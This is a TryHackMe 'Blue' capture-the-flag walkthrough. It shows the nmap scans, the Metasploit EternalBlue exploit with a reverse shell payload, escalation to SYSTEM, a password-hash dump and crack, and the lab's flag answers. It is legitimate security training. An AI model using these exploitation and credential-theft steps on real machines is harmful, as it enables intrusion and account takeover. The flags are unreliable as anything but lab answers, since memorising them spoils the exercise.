4 minutes
THM_Blue_Walkthrough
Eternal Blue TryHackMe
performed by: jb-williams
Note- some output will be shortened denoted by “….”
Scanning/Recon
After finding the IP address, I ran my basic nmap recon:
nmap -v -sV -sC -oN initial 10.10.10.13
Results -
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds
(workgroup: WORKGROUP)
....
....
- Came back with these results and noticed ports
138
and445
, which are usually SMB so I ran nmap with specific SMB scripts:
the first one could work but I don’t think my VM could handle it so I did a little research and ran the second cmd
nmap -v --script=smb* -oN scripts 10.10.10.13
nmap -v --script=smb-vuln-ms17-010 -oN smbscript 10.10.10.13
- The results of the SMB scan were:
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
....
....
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-
wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Host script results:
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC:-
02:8d:e0:a6:1c:6f (unknown)
| Names:
| JON-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| JON-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-09-23T10:23:28-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-09-23 16:23:28
|_ start_date: 2022-09-23 16:17:45
- Found that the vulnerability in SMB was
HIGH
, and went to Metasploit to find an expoit to attempt.
Gain Access
- ---- --------------- ---- ----- ----
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No
MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command
Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No
MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes
MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes
MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code
Execution
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes
SMB DOUBLEPULSAR Remote Code Execution
-
I noticed the scanner module and decided to verify the vulnerability with it, which it confirmed the vulnerability.
-
Then I tried index 2 exploit.
msf5 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) >
set payload windows/x64/shell/reverse_tcp
run
May have to press ENTER to make the CMD prompt open.
- Then press
CTRL+z
to push this shell session to the background.
Escalate
-
Then you can try to escalate the standard shell session to an escalated meterpreter session.
-
Select the
shell_to_meterpreter
module.
C:\Windows\system32>^Z
Background session 1? [y/N] y
msf5 exploit(windows/smb/ms17_010_eternalblue) > back
msf5 > search shell_to_meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Desc.
- ---- --------------- ---- ----- --------
0 post/multi/manage/shell_to_meterpreter normal No Shell to
Meterpreter Upgrade
-
List the modules options with
otpions
-
List the available sessions with
sessions -l
. -
Set the option to the correct session and run.
-
After it completes
sessions -l
thensessions -i <ID#>
to connect to that session. -
Verified escalation by checking my user.
meterpreter > shell
Process 1704 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
- Looking up processes on the machine and found that this one seemed interesting.
C:\Windows\system32>
--- ---- ---- ---- ------- ---- ----
668 608 winlogon.exe x64 1 NT AUTHORITY\SYSTEM -
C:\Windows\System32\winlogon.exe
- Then I migrated to winlogon.exe and was able to dump the password hashes on the system.
meterpreter > migrate -P 668
[*] Migrating from 748 to 668...
[*] Migration completed successfully.
meterpreter >
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Cracking
-
Then I took Jon’s password hash
ffb43f0de35be4d9917ac0cc8ad57f8d
. -
Used Crackstation.net to crack the hash.
User | Password |
---|---|
jon | alqfna22 |
- Was able to login as Jon then started looking for flags.
meterpreter > search -f flag*.txt
Found 3 results...
c:\flag1.txt (24 bytes)
c:\Users\Jon\Documents\flag3.txt (37 bytes)
c:\Windows\System32\config\flag2.txt (34 bytes)
Searching for flags
- Found flag1 by going to root C: drive and ls and catting flag1.txt
flag{access_the_machine}
- Found flag2 looking for Windows Sam Config
C:/Windows/System32/config
ls
cat flag2.txt
flag{sam_database_elevated_access}
- Found flag3 in Jon’s Documents folder.
meterpreter > cat c:\\Users\\Jon\\Documents\\flag3.txt
flag{admin_documents_can_be_valuable}
written and performed by jb-williams - github
windows pentest escalation metasploit scanning password-cracking smb tryhackme blue eternal-blue walkthrough
752 Words
2022-09-28 10:21